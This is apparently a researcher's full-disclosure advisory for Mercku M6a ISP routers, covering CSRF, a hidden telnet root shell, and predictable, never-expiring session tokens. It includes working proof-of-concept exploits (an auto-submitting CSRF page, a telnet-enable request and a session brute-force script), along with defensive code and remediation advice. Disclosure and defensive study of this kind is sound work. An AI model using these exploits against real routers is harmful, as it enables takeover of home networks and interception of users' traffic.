Merck'd-U!
Request for CVE and full disclosure of 0-Click/1-Click RCE in default ISP routers (Mercku M6a)
Introduction
Router vulnerabilities continue to pose significant threats to home networks. Today, I’ll document a series of critical flaws discovered in Mercku routers, specifically the M6a model, that could allow attackers to achieve remote code execution with minimal effort. This has been tested and confirmed against version 2.1.0 of the official firmware. This is also an informal escalation for CVEs for these vulnerabilities. (CVE Request 1744791)
Mercku Router Family
Mercku is a company based out of Canada that provides ISPs with prebuilt routers for their consumers and also sells these devices directly to end users. Mercku appears to be the distributor and marketer for a Chinese development team that produces the devices. The ISPs are Start.ca, FibreStream, Innsys, RealNett, Orion Telekom, and Kelcom, and potentially others. The CEO Shi Ge (contact email ge.shi@foxmail.com, as listed on the FCC ID submission) has been notified starting on October 6th 2024 and multiple times after with responsible disclosure requests. There has been no response or acknowledgement yet. The listed ISPs have also been notified. Mercku also appears to violate the GPL license of the OpenWrt code they based their product on.
The Vulnerability Chain
What makes this discovery particularly alarming is how multiple vulnerabilities combine into a devastating attack chain.
Vulnerability CSRF in password change:
The first link in the chain is a classic Cross-Site Request Forgery (CSRF) vulnerability in the password change functionality. This allows an attacker to force a password reset without the user’s knowledge or consent.
The router’s web interface lacks proper CSRF protection, allowing an attacker to craft a malicious request that appears legitimate to the router when executed by the logged-in user. The attacker can force an admin password reset without the user knowing.
Proof of Concept:
<html>
  <body>
    <form action="http://192.168.127.1/app" method="POST" enctype="text/plain">
      <input type="hidden" name='{"method":"mesh.config.admin.update","params":{"password":"abcd1234"}}' value="" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      history.pushState('', '', '/');
      document.forms[0].submit();
    </script>
  </body>
</html>
Impact: CVSSv3.1 AV:A/AC:L/PR:H/UI:R/S:C/C:H/I:H/A:H
An attacker on the local network can hijack administrative access.
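As an added example (not Mercku's code), this is the kind of server-side gate a JSON endpoint like /app should have had; it assumes a per-session CSRF token carried in an X-CSRF-Token header and headers passed as a lower-cased dict. The text/plain form above fails the very first check, and a cross-origin page never gets as far as the token check.

```python
# Added example, not Mercku's code: a request gate for a JSON-RPC endpoint like /app
# that would have rejected the text/plain form post shown above.
import hmac
import json
import secrets

ROUTER_ORIGIN = "http://192.168.127.1"   # the router's own origin, as used on the page
CSRF_HEADER = "x-csrf-token"             # assumed header name for the per-session token

def new_csrf_token():
    """Generated at login and stored alongside the session (assumed design)."""
    return secrets.token_urlsafe(32)

def check_request(headers, body, session_csrf):
    """Return (allowed, reason). `headers` maps lower-cased header names to values."""
    # 1. A JSON body must be declared as JSON. An HTML <form> can only send
    #    text/plain, multipart or urlencoded bodies, so this alone stops the forged post.
    media_type = headers.get("content-type", "").split(";")[0].strip().lower()
    if media_type != "application/json":
        return False, "content-type is not application/json"
    # 2. Browsers set Origin on every POST and page script cannot change it,
    #    so a request that did not come from the router's own pages is refused.
    if headers.get("origin") != ROUTER_ORIGIN:
        return False, "cross-origin request"
    # 3. State-changing calls must carry the per-session token (constant-time compare).
    sent = headers.get(CSRF_HEADER, "")
    if not hmac.compare_digest(sent.encode(), session_csrf.encode()):
        return False, "missing or wrong csrf token"
    # 4. Finally the body has to be well-formed JSON with a string "method".
    try:
        req = json.loads(body)
    except ValueError:
        return False, "body is not valid json"
    if not isinstance(req, dict) or not isinstance(req.get("method"), str):
        return False, "no method"
    return True, req["method"]

# Constructed inputs: what the CSRF page above actually sends (a text/plain form
# encodes the field as "name=value\r\n", so the JSON arrives with "=" glued on),
# next to a legitimate call from the router's own UI.
FORGED = ({"content-type": "text/plain", "origin": "http://attacker.example"},
          b'{"method":"mesh.config.admin.update","params":{"password":"abcd1234"}}=\r\n')
LEGIT_TOKEN = new_csrf_token()
LEGIT = ({"content-type": "application/json;charset=UTF-8", "origin": ROUTER_ORIGIN,
          CSRF_HEADER: LEGIT_TOKEN}, b'{"method":"mesh.mode.get"}')

if __name__ == "__main__":
    print("forged:", check_request(*FORGED, LEGIT_TOKEN))
    print("legit :", check_request(*LEGIT, LEGIT_TOKEN))
```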
Hidden Telnet Backdoor
Once administrative access is gained, the real danger emerges. Mercku routers contain a hidden endpoint that enables a telnet server.
Buried in the advanced settings is an undocumented API call that activates telnet access. You can reach this unlisted page by navigating your browser to http://192.168.127.1/web/advance/telnet. This isn’t just a debugging feature; it’s a full root shell waiting to be enabled.
Proof of Concept:
POST /app HTTP/1.1
Host: 192.168.127.1
Content-Length: 67
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.9
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.6613.120 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://192.168.127.1
Referer: http://192.168.127.1/web/advance/telnet
Accept-Encoding: gzip, deflate, br
Cookie: session=s1591239132
Connection: keep-alive

{"method":"router.telnet.enabled.update","params":{"enabled":true}}
Impact: CVSSv3.1 AV:L/AC:L/PR:H/UI:N/S:C/C:N/I:L/A:N
Administrative users can create persistent backdoors, maintaining access even after password changes.
Root Privilege Escalation
The telnet server doesn’t just provide access. It logs you in as root when you supply the web admin password. This turns a web interface compromise into full system control.
The Root Shell:
[attacker@desktop.local][~]% telnet 192.168.127.1
Trying 192.168.127.1...
Connected to 192.168.127.1.
Escape character is '^]'.
Mercku login: root
Password:
BusyBox v1.25.1 () built-in shell (ash)
═════════════════════════════════════════════════════════════════════════════════════════
███╗ ███╗███████╗██████╗ ██████╗██╗ ██╗██╗ ██╗ ████████╗███████╗ ██████╗██╗ ██╗
████╗ ████║██╔════╝██╔══██╗██╔════╝██║ ██╔╝██║ ██║ ╚══██╔══╝██╔════╝██╔════╝██║ ██║
██╔████╔██║█████╗ ██████╔╝██║ █████╔╝ ██║ ██║ ██║ █████╗ ██║ ███████║
██║╚██╔╝██║██╔══╝ ██╔══██╗██║ ██╔═██╗ ██║ ██║ ██║ ██╔══╝ ██║ ██╔══██║
██║ ╚═╝ ██║███████╗██║ ██║╚██████╗██║ ██╗╚██████╔╝ ██║ ███████╗╚██████╗██║ ██║
╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚══════╝ ╚═════╝╚═╝ ╚═╝
═════════════════════════════════════════════════════════════════════════════════════════
* Image information:
* Customer ID = 0001
* Product Model = M8
* Build Environment = 0
* Image version = 2.1.0
* Web version = m6a-v2.1.0
* Build Time = 2023-11-21T11:33:20+00:00
*
* More information:
* https://www.mercku.com
═════════════════════════════════════════════════════════════════════════════════════════
root@Mercku:~#
Impact: CVSSv3.1 AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
Web admin access translates to complete device compromise, enabling traffic interception, lateral movement, and unrestricted code execution.
Weak Session Tokens
The authentication system uses predictable session tokens based on timestamps, making brute-force attacks feasible.
Session cookies follow the pattern s{timestamp}, allowing attackers to work backwards from the current time to find valid sessions. There is no rate limiting, and no secure cryptographic algorithm is used for session generation.
Proof of Concept:
import requests
import time

# Start at the current time and walk backwards one second at a time,
# since every session cookie is just 's' followed by its creation timestamp.
cookie_current_time = int(time.time())

headers = {
    'Host': '192.168.127.1',
    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0',
    'Accept': 'application/json, text/plain, */*',
    'Accept-Language': 'en-US,en;q=0.5',
    'Content-Type': 'application/json;charset=utf-8',
    'Origin': 'http://192.168.127.1',
    'Connection': 'keep-alive',
    'Referer': 'http://192.168.127.1/web/login',
}

# A harmless read-only call; a 200 instead of a 401 means the guessed session is valid.
json_data = {
    'method': 'mesh.mode.get',
}

while cookie_current_time > 0:
    cookies = {
        'session': f's{cookie_current_time}',
    }
    response = requests.post('http://192.168.127.1/app', cookies=cookies, headers=headers, json=json_data, verify=False)
    print(f'Cookie: s{cookie_current_time}, Response: {response.status_code}')
    cookie_current_time -= 1
Sample brute.py output:
Cookie: s1728244441, Response: 401
Cookie: s1728244440, Response: 401
Cookie: s1728244439, Response: 200
Cookie: s1728244437, Response: 401
Impact: CVSSv3.1 AV:A/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N
Sessions can be hijacked through brute-forcing, or stolen from local browser cache.
Eternal Sessions
Adding insult to injury, session tokens persist indefinitely.
Proof of Concept:
POST /app HTTP/1.1
Host: 192.168.127.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; rv:125.0) Gecko/20100101 Firefox/125.0
Accept: application/json, text/plain, */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;charset=utf-8
Content-Length: 26
Origin: http://192.168.127.1
DNT: 1
Connection: keep-alive
Referer: http://192.168.127.1/web/login
Cookie: session=s1591239076

{"method":"mesh.mode.get"}
Note: the session cookie s1591239076 is the Unix timestamp of Thu Jun 04 02:51:16 2020 UTC, while today’s date is 1728249261, or Sun, 06 Oct 2024 21:14:21 UTC.
Impact: Attackers can reuse very old sessions.
This may allow captured credentials or forged sessions to remain valid well beyond the expected authentication time, including surviving router reboots.
The Complete Attack Chain
Combining these vulnerabilities creates a nightmare scenario:
- LAN Attack: An attacker on the local network brute-forces session tokens or exploits CSRF to change the admin password
- Enable Backdoor: Use admin access to activate the hidden telnet server
- Root Access: Connect via telnet using the admin password to gain root shell
- Network Domination: From root, intercept traffic, modify settings, or pivot to other devices
This is for the default configuration. The CSRF could be completed over the internet, but with limited availability to log in with the changed password.
Some users who have allowed access to the management interface from the internet have been found on Shodan: around 695 hosts at the time of writing.
This can be accomplished in 0-clicks (brute-force only) or 1-click (CSRF) scenarios. Automation and weaponization of the PoC code described in this disclosure is an exercise for the reader.
Implications and Recommendations
These vulnerabilities expose fundamental security failures in Mercku routers. With default configurations, anyone on the WiFi could potentially take control of the router. If remote management is enabled, attacks could come from the internet.
Immediate action is required to patch this vulnerability and prevent potential exploitation by attackers.
Remediation Advice
- Implement proper CSRF protection
- Remove or secure hidden endpoints
- Use cryptographically secure session generation
- Enforce session expiration
- Follow GPL requirements for OpenWrt modifications
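As an added example (not Mercku's code) covering the weak-token and eternal-session findings together with the last two remediation items: a check that flags an s{timestamp} cookie and reports how old it is, next to a session store that issues random tokens, expires them, and revokes them on password change. The timeout values are assumed.

```python
# Added example, not Mercku's code: flagging timestamp-derived cookies, and a session
# store with random tokens plus idle/absolute expiry and revoke-on-password-change.
import re
import secrets
import time

TOKEN_RE = re.compile(r"^s(\d{9,10})$")   # the s{unix_timestamp} pattern found on the M6a

def timestamp_token_age(token, now=None):
    """Seconds since the timestamp embedded in an s{timestamp} cookie, or None if the
    cookie does not follow that pattern. Any non-None result means the token is guessable:
    there is only one candidate per second of the session's possible age."""
    m = TOKEN_RE.match(token)
    if m is None:
        return None
    now = int(time.time()) if now is None else now
    return now - int(m.group(1))

class SessionStore:
    """Server-side sessions keyed by an unguessable token (assumed timeouts)."""
    IDLE_TIMEOUT = 15 * 60        # inactivity after which the session is dropped
    MAX_LIFETIME = 8 * 60 * 60    # hard cap even for an active session

    def __init__(self):
        self._sessions = {}

    def create(self, user, now):
        token = secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG, unrelated to time
        self._sessions[token] = {"user": user, "created": now, "last_seen": now}
        return token

    def validate(self, token, now):
        """Return the session's user, or None; expired sessions are deleted on sight."""
        s = self._sessions.get(token)
        if s is None:
            return None
        if now - s["last_seen"] > self.IDLE_TIMEOUT or now - s["created"] > self.MAX_LIFETIME:
            del self._sessions[token]
            return None
        s["last_seen"] = now
        return s["user"]

    def revoke_all(self):
        """Run on every admin password change so a stolen cookie dies with the old password."""
        self._sessions.clear()

if __name__ == "__main__":
    # The cookie from the "Eternal Sessions" request, checked against the page's own "today".
    print("age of s1591239076 in days:", timestamp_token_age("s1591239076", 1728249261) // 86400)
```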
Full Disclosure
Due to the lack of communication with Mercku and their compromised support portal, I have been forced to move towards full disclosure of these security bugs to better inform the users of these devices and the ISPs that issue them as default, and to hold the company accountable.
Gr33tz
- Special thanks to @z3r0 for support and testing
- Shout out to @skinnyquiver for the hidden telnet access
Happy (ethical) hacking!